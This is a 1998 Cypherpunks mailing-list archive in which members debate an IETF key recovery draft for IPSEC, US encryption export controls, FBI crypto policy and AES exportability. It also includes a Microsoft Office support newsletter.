In <35F37E90.76109489@brd.ie>, on 09/07/98 
   at 07:34 AM, "Frank O'Dwyer" <fod@brd.ie> said:


>Well, the attached draft is not designed for corporate recovery of
>encrypted email, that's for sure.

4.  ACKNOWLEDGMENTS

This document was produced based on the combined efforts of the protocol
subcommittee of the Key Recovery Alliance.


Why am I not surprised?

I hope the IETF will not accept the implementation of *any* GAK proposals
into the RFC's. If these people want to force Big Brother on us they
should not have the benefit of the IETF to do so.

I plan on writting to the Security Group at the IETF on this. Hopefully it
will not be accepted for consideration. I would like to see the IETF have
a blanket policy automatically rejecting any GAK proposals but that might
be too much to ask.

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Mon, 7 Sep 1998 16:07:33 +0800
To: cypherpunks@cyberpass.net
Subject: KRAP is at it in the IETF
Message-ID: <199809070805.EAA21826@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hello,

It has come to my attention that the KRAP (key recovery alliance program)
has submitted an I-D (internet draft) to the IETF for adding GAK
(government access to keys) to the IPSEC protocols:

ftp://ftp.ietf.org/internet-drafts/draft-rfced-exp-markham-00.txt

ISAKMP Key Recovery Extensions
<draft-rfced-exp-markham-00.txt>

7. AUTHOR INFORMATION

   Tom Markham
   Secure Computing Corp
   2675 Long Lake Road
   Roseville, MN 55113   USA

   Phone: 651.628.2754,    Fax:   651.628.2701
   EMail: tom_markham@securecomputing.com


I consider this a perversion of the standards process of the IETF to
advance a political agenda which must be stopped at all cost.

Below are the e-mail addresses of some people that you should write
(politely) expressing your objections to any such additions to the
protocols:

IPSEC Chairs:

Theodore Ts'o <tytso@mit.edu>
Robert Moskowitz <rgm@icsa.net>

Security Area Directors:

Jeffrey Schiller <jis@mit.edu>
Marcus Leech <mlecch@nortel.ca>

As I mentioned before, be polite. These people are not the ones proposing
GAK be added to the IPSEC protocols. They have put a lot of time and
effort in forwarding the cause for strong encryption. They should be made
aware of the communities objections to these attempts by KRAP.

Thanks,

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: It's OS/2, Jim, but not OS/2 as we know it.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfOVk49Co1n+aLhhAQFJwwP+O4vrZVKFpOG8vCHFwbDuPIv/99AhBnKF
RK/Ikc5y2gGKq9hfxkTb4o77YUrDaEGkYUPHk+ZC57Oag0Lu1v6W1EAbQ5T4RpzH
JWYXOonQmbqw5rH0h6brzqrH3ep9Ej9DR0gv4mGgIfSNlJSUu6TWO5ZHXKWiE4yy
5flH0Ngg/TI=
=EzNL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Mon, 7 Sep 1998 18:09:54 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: Snakes of Medusa torment Larry Detweiler
In-Reply-To: <199809070757.AAA07875@netcom13.netcom.com>
Message-ID: <000701bdda48$215d3920$4f8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Vladimir Z Neurological:

: sure, let's have an immature debate society. we've had
: that for what, ~6 years or so? the time flies when you're
: having fun <g>

	[ . . . ]

: a huge waste of talent, if you ask me, and the main reason
: that you have such a high turnover/attrition on this list.
: ever asked yourself why there is so much turnover/attrition
: here?  [... and so forth ... ]
.........................................................

I ask myself why you're still hanging around on this worthless list after all this time,
LD, seeing as how you yourself - unlike everyone else - are so mature, so talented, and
would rather be coding than wasting your time reading what TCM has to say about anything.

It must be that you really enjoy it and find it intrinsically valuable.
    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimg@mentat.com (Jim Gillogly)
Date: Mon, 7 Sep 1998 20:40:37 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Encryption Expert Says U.S. Laws Led to Renouncing of   Citizenship
Message-ID: <199809071236.FAA05486@zendia.mentat.com>
MIME-Version: 1.0
Content-Type: text/plain



M-K Shen wrote:
> 
> Robert Hettinga wrote:
> > 
> > Sameer Parekh, the president of the Web server company C2 Net, said:
> > "I think it's essential if you want business that you're doing your
> > development overseas. It's pretty clear to anyone internationally that
> > anything exportable [from the United States] is a joke."
> 
> Let's wait and see whether AES will be genuinely exportable.

Why wait?  None of the AES candidates is currently exportable without a
license, and the much weaker DES algorithm that one of them will replace
is not exportable without a license.  In fact, according to the instructions
posted at NIST the algorithm designers from outside the US and Canada were
required to fill out export license applications in order to get a copy of
their own algorithms back from NIST.

Without a change in the regulations AES will be no more exportable
than DES is now.

	Jim Gillogly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 7 Sep 1998 21:56:34 +0800
To: Tim May <tcmay@got.net>
Subject: Re: What we are Fighting
In-Reply-To: <v03130307b218f992deb9@[209.66.100.36]>
Message-ID: <Pine.GSO.3.95.980907064846.7404C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 6 Sep 1998, Tim May wrote:
> 
> There are, officially, no proposals on the table to limit speech within the
> U.S. by limiting the types and forms of language may use. There is the SAFE
> bill, which stands zero chance of passing, but this involves relaxing
> export requirements (though I expect compromises added, such as the
> felonization of crypto use in a crime, are an unwelcome step toward
> domestic restrictions).

Every version of SAFE includes crypto-in-a-crime as a key component. The
thinking of its drafters and backers like Reps. Goodlatte, Eschoo,
Lofgren, CDT, and some corporate lobbyists is that it would be too
politically controversial to pass Congress without it.

There is, offically, a proposal on the table to limit speech within the
U.S. by restricting sale, manufacture, distribution, import of non-GAK'd
crypto. A House committee approved that one year ago.

-Declan

PS: Note to DC cypherpunks. There's a meet/party 9-19 in Adams Morgan.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Mon, 7 Sep 1998 14:43:03 +0800
To: cypherpunks@cyberpass.net
Subject: [Fwd: ISAKMP Key Recovery Extensions]
Message-ID: <35F37E90.76109489@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain

Well, the attached draft is not designed for corporate recovery of
encrypted email, that's for sure.

Cheers,
Frank O'Dwyer.

To: cryptography@c2.net, cypherpunks@algebra.com
Subject: Re: ISAKMP Key Recovery Extensions
From: ulf@fitug.de (Ulf Mller)
Date: Mon, 7 Sep 98 01:47 +0200
In-Reply-To: <199809011443.KAA23307@ietf.org>
Organization: HR13
Sender: owner-cypherpunks@algebra.com


>From the IETF's IPSEC Working Group:

	Title		: ISAKMP Key Recovery Extensions
	Author(s)	: T. Markham
	Filename	: draft-rfced-exp-markham-00.txt
	Pages		: 13
	Date		: 31-Aug-98
	
    This document describes the proposed approach for negotiating and
    exchanging key recovery information within the Internet Security
    Association Key Management Protocol (ISAKMP).

ftp://ftp.ietf.org/internet-drafts/draft-rfced-exp-markham-00.txt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 7 Sep 1998 20:05:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: What we are Fighting
Message-ID: <199809071201.IAA01590@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: Tim May <tcmay@got.net>
   >   >Information "I am not a klook" Security wrote:
   >
   >   >> Subject: Terrorist FBI, on Terrorism
   >   >> Date: Fri, 4 Sep 1998 09:58:23 EDT
   >   >>
   >   >> Statement for the Record
   >   >> FBI Director Louis J. Freeh before the Senate Judiciary Committee,
   >   >> September 3, 1998
   >
   >   >> The FBI supports a balanced encryption policy that satisfies fourth
   >   >> amendment concerns for privacy, the commercial needs of industry for
   >   >> robust encryption, and the government's public safety and national
   >   >> security needs.
   >
   >   But it bears constant repeating, especially to the skeptical, that there
   >   are NO DOMESTIC CRYPTO LAWS.
   >
   >   We all know this, but Freeh and Company continue to mumble about "meeting
   >   the legitmate needs of law enforcement." What can they be speaking of?
   >
   >   Obviously his side is contemplating domestic crypto restrictions.
   >
   >   They are planning domestic crypto restrictions, GAK, and all the rest of
   >   what we have long expected.

They have stated so openly; ~"if we hear a lot of encrypted hiss from [CALEA]
intercepts, we'll need GAK to be the law of the land". (a tilde before the
quote means I am paraphrasing).

In fact, at the same time the FBI used to say they weren't calling for
such a law, they were pushing behind the scenes for it.

*   http://epic.org/crypto/ban/fbi_dox/impact_text.gif
*
*   SECRET FBI report
*
*                   NEED FOR A NATIONAL POLICY
*
*   A national policy embodied in legislation is needed which insures
*   that cryptography use in the United States should be forced to be
*   crackable by law enforcement, so such communications can be monitored
*   with real-time decryption.
*   
*   All cryptography that cannot meet this standard should be prohibited.

And here's the ECHELON/UKUSA slant:

*   What Is The OECD
*
*   The Organization for Economic Co-operation and Development, based in
*   Paris, France, is a unique forum permitting governments of the
*   industrialized democracies to study and formulate the best policies
*   possible in all economic and social spheres.

: From owner-firewalls-outgoing@GreatCircle.COM Wed May 14 18:54:15 1997
: Received: from osiris (osiris.nso.org [207.30.58.40]) by ra.nso.org
:           (post.office MTA v1.9.3 ID# 0-13592) with SMTP id AAA322
:           for <firewalls@GreatCircle.COM>; Wed, 14 May 1997 12:56:13 -0400
: Date: Wed, 14 May 1997 12:58:46 -0400
: To: firewalls@GreatCircle.COM
: From: research@isr.net (Research Unit I)
: Subject: Re: Encryption Outside US
:
:
: I was part of that OECD Expert Group, and believe I may shine at least
: some light on what exactly was said and happened at the meetings.
:
: The main conflict during all sessions was the demand of the US to be
: able to decrypt anything, anywhere at any time versus the European
: focus: we want to have the choice - with an open end - to maintain
: own surveillance.  The US demand would have caused an immediate
: ability to tap into what the European intelligence community believes to
: be its sole and exclusive territory. In fact the Europeans were not at all
: pleased with the US view points of controlling ALL crypto. Germany and
: France vigorously refused to work with the US on this issue.
:
: The Clipper initiative (at the time not readily developed) was completely
: banned, except for the Australian and UK views that felt some obligation
: from the 1947 UKUSA treaty (dealing with interchange of intelligence).
:
: With a vast majority the US was cornered completely, and had to accept
: the international views. And actually adopted those as well.  EFF, EPIC and
: other US organizations were delighted to see the formal US views barred,
: but expressed their concern on the development of alternate political
: pressure that would cause the same effects.
:
: As time went by that was indeed what the US did, and up to now with minor
: success.
:
: Bertil Fortrie
: Internet Security Review

Declan, wanna track down this person and find out the names of those
who spoke of the ultra-secret UKUSA treaty that's never been seen,
and interview them?

----

When Sonny Bono hit a tree, yet another Senator convinced by the FBI/NSA's
little presentation of horrors (which is preceded by a visible sweep for
electronic bugs) was lost. Only an Executive Order seems like it will get
domestic crypto "outlawed".

One continued worrisome slant to the FBI/NSAs pushing for domestic GAK
is that they use the same arguments for retaining export controls (which
Clinton did by Executive Order, or they would have expired) as they give
for wanting to extend these controls domestically.

LART me if I'm wrong, but that makes the issue different from most
other export-controlled non-secret technology/products.

----

I still think someone (without a job ;-) should test the export law
by pulling in PGP from outside the US and then immediately putting
it back at the same site.

If could find someone on the lower East Side willing to do it
for $5000. Gilmore, care to make another investment in making
the government's position look silly? ;-)

---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 7 Sep 1998 20:27:49 +0800
To: cypherpunks@cyberpass.net
Subject: Re: What we are Fighting
In-Reply-To: <Pine.GSO.3.95.980906221144.24713B-100000@cp.pathfinder.com>
Message-ID: <Version.32.19980907073131.00fb96e0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim asks:

>Freeh and Company continue to mumble about "meeting
>the legitmate needs of law enforcement." What can they 
>be speaking of?
...
>Obviously his side is contemplating domestic crypto restrictions.

Threat of terrorism will be the impetus for applying national security 
restrictions domestically, for relaxing cold war limitations on spying
on Americans, for dissolving barriers between law enforcement
and military/intelligence agencies.

Technical means for access to encrypted data will probably
come first in communications, then to stored material. There
will be an agreement for increased CALEA wiretap funding, which 
is what the two cellular and wired suits against the FBI intend,
(paralleling what the hardware and software industries want from
federal buyers of security products).

This will provide the infrastructural regime for the gov to monitor 
and store domestic traffic as NSA does for the global, using the 
same technology (NSA may provide service to domestic
LEA as it now does for other gov customers for intel).

Other access will come through hardware and software for
computers, paralleling technology developed for telecomm tapping,
tracking and monitoring. 

Most probably through overt/covert features of microprocessors 
and OS's, as reported recently of Wintel and others, but also 
probably with special chips for DSP and software for modular 
design -- why build from scratch when these handy kits are 
available.

As noted here, the features will appear first as optional, in response
to demand from commerce, from parents, from responsible
institutions, to meet public calls for protection, for privacy, for
combating threats to the American people. 

Like wiretap law, use of the features for preventative snooping will 
initially require a court order, as provided in several of the crypto 
legislative proposals.

Like the wiretap orders, gradually there will be no secret court refusals 
for requests to use the technology in the national interest.

A publicity campain will proclaims that citizens with nothing to hide 
will have nothing to fear. Assurance of safety will be transparent, 
no clicks on the line. In a digital world, home-office devices will send
lifestyle data to the device manufacturers over the always monitoring 
transparental Net.

Personal privacy will evaporate almost unnoticeably, as with the tv 
remote control, cp/defcon/bar brag, telephone, fax and forever-lovers 
pillowtalk.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 7 Sep 1998 20:22:38 +0800
To: cypherpunks@cyberpass.net
Subject: Re: [Fwd: ISAKMP Key Recovery Extensions]
Message-ID: <199809071219.IAA01745@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: "William H. Geiger III" <whgiii@invweb.net>
   >
   >   In <35F37E90.76109489@brd.ie>, on 09/07/98 
   >      at 07:34 AM, "Frank O'Dwyer" <fod@brd.ie> said:
   >
   >   >Well, the attached draft is not designed for corporate recovery of
   >   >encrypted email, that's for sure.
   >
   >   4.  ACKNOWLEDGMENTS
   >
   >   This document was produced based on the combined efforts of the protocol
   >   subcommittee of the Key Recovery Alliance.
   >
   >   Why am I not surprised?
   >
   >   I hope the IETF will not accept the implementation of *any* GAK proposals
   >   into the RFC's. If these people want to force Big Brother on us they
   >   should not have the benefit of the IETF to do so.


    ftp://ftp.ietf.org/internet-drafts/draft-rfced-exp-markham-00.txt
    
     o Government Requirements: Governments must be able to intercept the
    CKRB at the time of key establishment or periodically while the
    security association remains active. This requires that the key
    recovery enabled entity transmit the CKRB during the key establishment
    protocol and every N hours during the security association.

Whooey!

They've been infiltrated by idjits.
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 7 Sep 1998 20:55:29 +0800
To: cypherpunks@toad.com
Subject: Re: What we are Fighting
In-Reply-To: <199809071201.IAA01590@panix7.panix.com>
Message-ID: <199809071245.IAA26339@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Guy wrote:

>I still think someone (without a job ;-) should test the export law
>by pulling in PGP from outside the US and then immediately putting
>it back at the same site.

The Ft. Bragg Net-offering of PGP (since withdrawn) has been available 
on our site without restrictions since April 1998 in the public interest:

   http://jya.com/pgp262-mil.zip  (includes the Ft. Bragg page; 274K)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 7 Sep 1998 20:55:55 +0800
To: tytso@mit.edu
Subject: KRAP is at it in the IETF
Message-ID: <199809071253.IAA01912@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: "William H. Geiger III" <whgiii@invweb.net>
   >
   >   -----BEGIN PGP SIGNED MESSAGE-----
   >
   >   Hello,
   >
   >   It has come to my attention that the KRAP (key recovery alliance program)
   >   has submitted an I-D (internet draft) to the IETF for adding GAK
   >   (government access to keys) to the IPSEC protocols:
   >
   >   ftp://ftp.ietf.org/internet-drafts/draft-rfced-exp-markham-00.txt
   >
   >   I consider this a perversion of the standards process of the IETF to
   >   advance a political agenda which must be stopped at all cost.
   >
   >   Below are the e-mail addresses of some people that you should write
   >   (politely) expressing your objections to any such additions to the
   >   protocols:

Dear Sirs,

#    o Government Requirements: Governments must be able to intercept the
#   CKRB at the time of key establishment or periodically while the
#   security association remains active. This requires that the key
#   recovery enabled entity transmit the CKRB during the key establishment
#   protocol and every N hours during the security association.

   Speaking as someone who monitors company Internet traffic (email)
for compliance and security purposes, I would like to ask why the IETF
is working on a key recovery standard.

   If a company chooses to deploy, say, PGP with key recovery internally,
then any messages sent with it encrypted in the receiving party's public
key are available to the sending company's Information Security personnel.

   If a company wishes to make the key recovery information available
to the government, they can individually choose to do that.

   The IETF should not be helping to put such an infrastructure in place.

   Governments are our adversaries with respect to encryption and privacy.

   The US government, represented by the FBI/NSA, used to state that they
weren't pushing for mandatory domestic encryption. (requiring people use
curtains on their homes that the government can see through)

   Eventually we found out they lied, and were pushing for exactly that
behind the scenes:

*   http://epic.org/crypto/ban/fbi_dox/impact_text.gif
*
*   SECRET FBI report
*                         
*                   NEED FOR A NATIONAL POLICY  
*                             
*   A national policy embodied in legislation is needed which insures
*   that cryptography use in the United States should be forced to be
*   crackable by law enforcement, so such communications can be monitored
*   with real-time decryption.
*
*   All cryptography that cannot meet this standard should be prohibited.

   Feel free to cite this manipulation when discarding key recovery proposals.

   If you put a key recovery proposal in place, it makes it that much
easier for them to require its use.

   Plus my basic complaint: this proposal is of no use to business
or Internet users.

   None.

   Its only purpose is to allow interception and decoding over the Internet.

   And if you think this would happen only with a court order, check out
this "anytime, anywhere" wording by the US government...
---guy

   Don't be another cog in the ECHELON monitoring machine.



The U.S. asked the OECD to agree to internationally required Key Recovery.

*   What Is The OECD
*
*   The Organization for Economic Co-operation and Development, based in
*   Paris, France, is a unique forum permitting governments of the
*   industrialized democracies to study and formulate the best policies
*   possible in all economic and social spheres.

: From owner-firewalls-outgoing@GreatCircle.COM Wed May 14 18:54:15 1997
: Received: from osiris (osiris.nso.org [207.30.58.40]) by ra.nso.org
:           (post.office MTA v1.9.3 ID# 0-13592) with SMTP id AAA322
:           for <firewalls@GreatCircle.COM>; Wed, 14 May 1997 12:56:13 -0400
: Date: Wed, 14 May 1997 12:58:46 -0400
: To: firewalls@GreatCircle.COM
: From: research@isr.net (Research Unit I)
: Subject: Re: Encryption Outside US
: 
: 
: I was part of that OECD Expert Group, and believe I may shine at least
: some light on what exactly was said and happened at the meetings.
: 
: The main conflict during all sessions was the demand of the US to be
: able to decrypt anything, anywhere at any time versus the European 
: focus: we want to have the choice - with an open end - to maintain
: own surveillance.  The US demand would have caused an immediate
: ability to tap into what the European intelligence community believes to
: be its sole and exclusive territory. In fact the Europeans were not at all
: pleased with the US view points of controlling ALL crypto. Germany and
: France vigorously refused to work with the US on this issue.
:
: The Clipper initiative (at the time not readily developed) was completely
: banned, except for the Australian and UK views that felt some obligation
: from the 1947 UKUSA treaty (dealing with interchange of intelligence).
: 
: With a vast majority the US was cornered completely, and had to accept
: the international views. And actually adopted those as well.  EFF, EPIC and
: other US organizations were delighted to see the formal US views barred,
: but expressed their concern on the development of alternate political
: pressure that would cause the same effects.
:
: As time went by that was indeed what the US did, and up to now with minor
: success.
: 
: Bertil Fortrie
: Internet Security Review
: ==




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 7 Sep 1998 23:54:31 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: What we are Fighting
In-Reply-To: <v03130307b218f992deb9@[209.66.100.36]>
Message-ID: <v03130308b219b1d32914@[209.66.100.36]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:53 AM -0700 9/7/98, Declan McCullagh wrote:

>There is, offically, a proposal on the table to limit speech within the
>U.S. by restricting sale, manufacture, distribution, import of non-GAK'd
>crypto. A House committee approved that one year ago.
>

I'd forgotten about that little one. Of course, it has not gone anywhere
(no Senate version or committee markup, right?), so I'm not yet ready to
say there's official action on its way. And, fortunately, the session is
over but for the shouting about Clinton and his cigars.

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Support Online Staff" <SupportOnlineStaff_001921@news.newswire.microsoft.com>
Date: Tue, 8 Sep 1998 05:36:43 +0800
To: <cypherpunks@toad.com>
Subject: Microsoft Office Support News Watch - September 7, 1998
Message-ID: <199809072128.OAA10646@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Microsoft Office Support News Watch
===================================

As a subscriber to the Microsoft Office Support News Watch, you receive e-
mail twice each month that highlights some of the new articles recently
published on Support Online, Microsoft's award-winning technical support
web site.

Contents
--------

 - Office Update Web Site
 - Outlook Security Patch
 - Office 2000
 - Kernel32.dll Error During Office Setup
 - "No License" Error When Running Microsoft Access 97 on Windows 98
 - Get Support Online Articles by E-mail

Office Update Web Site
======================

The Office Update Web site was recently modified to make it easier for you
to find up-to-date information about Office Products. Office Update is a
free online extension of Microsoft Office that is accessible to all users.
You can access the site from the link placed prominently at the top of each
of the Office products by clicking Help, selecting Microsoft On The Web,
and then clicking Free Stuff. You can find the Office Update site at the
following address on the World Wide Web:

   http://officeupdate.microsoft.com/

The Office Update site provides the latest Office service releases,
security patches, product add-ins, new Office assistants, clip art,
templates, and custom business solutions.

Outlook Security Patch
======================

Now available is an updated security patch for Microsoft Outlook 98 that
protects you against a potential problem involving file attachments with
extremely long names as well as a variant found during continued testing.
The new location of this patch is on the Office Update site at:

   http://officeupdate.microsoft.com/updates/updOutlook.htm

Office 2000
===========

For information about features in the next version of Office, go to the
Microsoft Office 2000 site on the Internet:

   http://www.microsoft.com/office/2000/

Kernel32.dll Error During Office Setup
======================================

When installing Office 97 on Microsoft Windows 98, you may receive the
following error message:

   This program has performed an illegal operation and will be shut down.
   If the problem persists, contact the program vendor.

If you click Details, you receive an error message similar to the
following:

   ACMSETUP caused an invalid page fault in module KERNEL32.DLL at
   0177:bff7be97.

This problem may occur when you have your CD-ROM drive configured to use
Direct Memory Access (DMA) in the Windows 98 Device Manager.

For information about this problem see Knowledge Base article Q190630.
This article is available on the Web at the following address:

   http://support.microsoft.com/support/kb/articles/Q190/6/30.asp

"No License" Error When Running Microsoft Access 97 on Windows 98
=================================================================

When you start Microsoft Access 97, you may receive the following error
message

   Microsoft Access can't start because there is no license for it on
   this machine.

even though you have a fully licensed copy of Microsoft Access. You may
receive this error message on a Windows 98 computer if the following
conditions are met:

 - You have installed Microsoft Publisher
 - You have installed Access from the Office 97 Professional CD

Certain fonts that are installed by Microsoft Publisher can result in the
incorrect registration of Microsoft Access 97, but only when Access is
being installed from the Office 97 Professional CD. You can correct the
registration error by using either of the following methods:

 - Rename one of the problem fonts, and then reinstall Microsoft Access
   from the Setup Maintenance Mode.

    -or-

 - Download a tool that Microsoft has on its Downloads Web site that
   corrects this problem.

Renaming the Font and Reinstalling Microsoft Access
---------------------------------------------------

Reinstalling Microsoft Access 97 using the Setup Maintenance Mode does not
require you to uninstall Microsoft Access first; it simply returns the
computer to the install state that it was in the last time Setup was run.
Follow these steps to correct the registry error:

 1. On the Start menu, point to Find, and then click Files Or Folders.

 2. In the Named box, type "hatten.ttf" (without the quotation marks).

 3. In the Look In box, type "C:\Windows\Fonts" (without the quotation
    marks) or the path to the Fonts folder on your computer.

 4. Click the Find Now button to start the search.

 5. Under Name, right-click the hatten.ttf file, and click Rename on
    the menu that appears.

 6. Change the name of the file to "hatten.xxx" (without the quotation
    marks).

 7. Minimize (but do not close) the Find dialog box.

 8. On the Start Menu, point to Settings, and click Control Panel.

 9. In Control Panel, double-click Add/Remove Programs.

10. In the Add/Remove Program Properties dialog box, select the
    Install/Uninstall tab and select Microsoft Office 97, Professional
    Edition from the program list.

11. Click the Add/Remove button to run Office Setup in Maintenance
    Mode.

12. In the Microsoft Office 97 Setup dialog box, click Reinstall.

13. Once the reinstallation is finished, click the Find dialog box on
    the Windows taskbar to maximize it.

14. Under Name, right-click the hatten.xxx file, and click Rename on
    the menu that appears.

15. Change the name of the file to "hatten.ttf" (without the quotation
    marks).

Microsoft Access should now be properly registered.

Using the Downloadable Tool
---------------------------

The AcLicn97.exe file contains a tool that corrects the problem discussed
in this article so that you can run Microsoft Access 97 successfully. You
can download AcLicn97.exe from the following Microsoft Web site:

   http://support.microsoft.com/download/support/mslfiles/ACLICN97.EXE

AcLicn97.exe is a self-expanding archive. Run the file to expand its
contents, and then run the expanded file, AcLicens.exe, to properly
register Microsoft Access 97 on your computer. Please note that this
download will only work if the conditions stated above are met. For
solutions to other causes of the same error message, please see the
following article in the Microsoft Knowledge Base:

   ARTICLE-ID: Q141373
   TITLE     : ACC: "There is no license" Error Starting Microsoft
   Access

   http://support.microsoft.com/support/kb/articles/Q141/3/73.asp

Get Support Online Articles by E-mail
=====================================

You can receive these articles (and others) in e-mail by sending a message
to mshelp@microsoft.com. In the Subject line of your message, enter the
Article-ID number (Qnnnnnn). For example to receive Q162721, your Subject
line should resemble the following example:

   Subject: Q162721

You can have multiple articles sent to you in e-mail by typing multiple
Article-ID numbers separated by a comma. For example:

   Subject: Q178049, Q174914, Q174062

To receive an index of articles, enter "Index" (without quotation marks) in
the Subject line. For example:

   Subject: Index

The MSHelp Index is updated monthly. For more information about MSHelp, see
http://support.microsoft.com/support/kb/articles/q183/1/21.asp.


Sincerely,
The Support Online Team

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft-sponsored events:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For information on all Microsoft-sponsored events, please visit:
http://events.microsoft.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How to use this mailing list:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You received this e-mail newsletter as a result of your registration on the Microsoft.com Personal Information Center.

To unsubscribe, please send a reply to this e-mail with the word "unsubscribe" as the first line in the body of the message.

To further define your communication preferences with Microsoft, please visit:
http://www.microsoft.com/misc/unsubscribe.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THIS DOCUMENT IS PROVIDED FOR INFORMATIONAL PURPOSES ONLY.  The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication.  Because Microsoft must respond to change in market conditions, it should not be interpreted to be a commitment on the part of Microsoft and Microsoft cannot guarantee the accuracy of any information presented after the date of publication.
INFORMATION PROVIDED IN THIS DOCUMENT IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND FREEDOM FROM INFRINGEMENT.
The user assumes the entire risk as to the accuracy and the use of this document. This  document may be copied and distributed subject to the following conditions:
1.   All text must be copied without modification and all pages must be included
2.   All copies must contain Microsoft's copyright notice and any other notices provided therein
3.   This document may not be distributed for profit




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 8 Sep 1998 00:14:10 +0800
To: Mok-Kong Shen <cypherpunks@cyberpass.net
Subject: Re: IP: Encryption Expert Says U.S. Laws Led to Renouncing of  Citizenship
In-Reply-To: <v0401173cb2186ae5e832@[139.167.130.246]>
Message-ID: <v03130309b219b4b5d67a@[209.66.100.36]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:01 AM -0700 9/7/98, Mok-Kong Shen wrote:
>Robert Hettinga wrote:
>>
>> Sameer Parekh, the president of the Web server company C2 Net, said:
>> "I think it's essential if you want business that you're doing your
>> development overseas. It's pretty clear to anyone internationally that
>> anything exportable [from the United States] is a joke."
>
>Let's wait and see whether AES will be genuinely exportable.
>

If it's as strong as it is supposed to be, e.g, much stronger than 3DES for
example, then OF COURSE it will not be exportable.

However, the neat thing about such a standard, with the algorithm carefully
described and published, is that many can implement it. There should be no
particular need to "export" implmentations out of the U.S. when so many
European and Asian and Carribbean folks will be implementing it and
embedding it in other applications.

(I don't follow AES stuff, so I may be missing some details, such as how
licensing (barf) will work. Maybe, like IDEA, implementors will be supposed
to seek a license. If so, then maybe implementors will have to go to
whomever controls the process, such as NIST, and request a license.
Probably NIST will deny a license to Hezbollah Cryptography Company. And so
it goes.)

I can't get too excited about AES. Plenty of ciphers out there. Which
cipher handles the high-speed stuff inside an app like PGP is not of great
concern to me. Especially since the speed of ciphers is less important for
the kind of political messages which interest me.

(I'm not belittling work on AES. It's both important for various network
uses, and interesting in its own right. Just not to me.)

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 8 Sep 1998 00:18:54 +0800
To: Ryan Lackey <cypherpunks@Algebra.COM
Subject: Re: Cypherpunks HyperArchive
